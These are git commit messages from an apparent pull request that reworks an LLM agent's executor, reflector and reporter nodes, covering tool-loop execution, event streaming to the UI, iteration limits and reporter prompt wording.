Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- executor_node now passes tools and max_cycles=MAX_THINK_ACT_CYCLES
  to invoke_with_tool_loop, running the full think→tool→result→think
  loop internally instead of relying on graph topology
- Strip tool_calls from final response after internal execution so
  the graph doesn't re-execute them via ToolNode
- Each cycle now produces thinking + micro-reasoning + tool execution

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When invoke_with_tool_loop executes tools internally, emit proper
tool_call sub_events BEFORE execution and tool_result sub_events
AFTER execution. The serializer now handles all three sub_event
types: thinking, tool_call, tool_result.

This restores tool call visibility in the UI that was lost when
tool execution moved from graph topology to internal loop.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Executor back to max_cycles=1 (graph topology: executor→tools→executor).
Internal multi-cycle loop broke SSE streaming because tools executed
inside the node without emitting events. Reporter keeps internal loop
(max_cycles=3) since it's short-lived and doesn't need real-time streaming.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Reflector: when all steps complete (next_step >= len(plan)), set
  done=True and route to reporter directly instead of looping through
  step_selector → executor → reflector again
- Reporter prompt: remove "use glob" instruction that Llama 4 Scout
  echoed verbatim. Add "do NOT echo these instructions" guard.
- Simplify report structure section

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- max_iterations 100→200, max_tool_calls_per_step 10→20
- Reporter prompt: remove Report Structure section that LLM echoed,
  add "do NOT echo instructions" and "start directly with summary"
- List workspace file paths in full form

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Labels

None yet

Projects

Status: Backlog

2 participants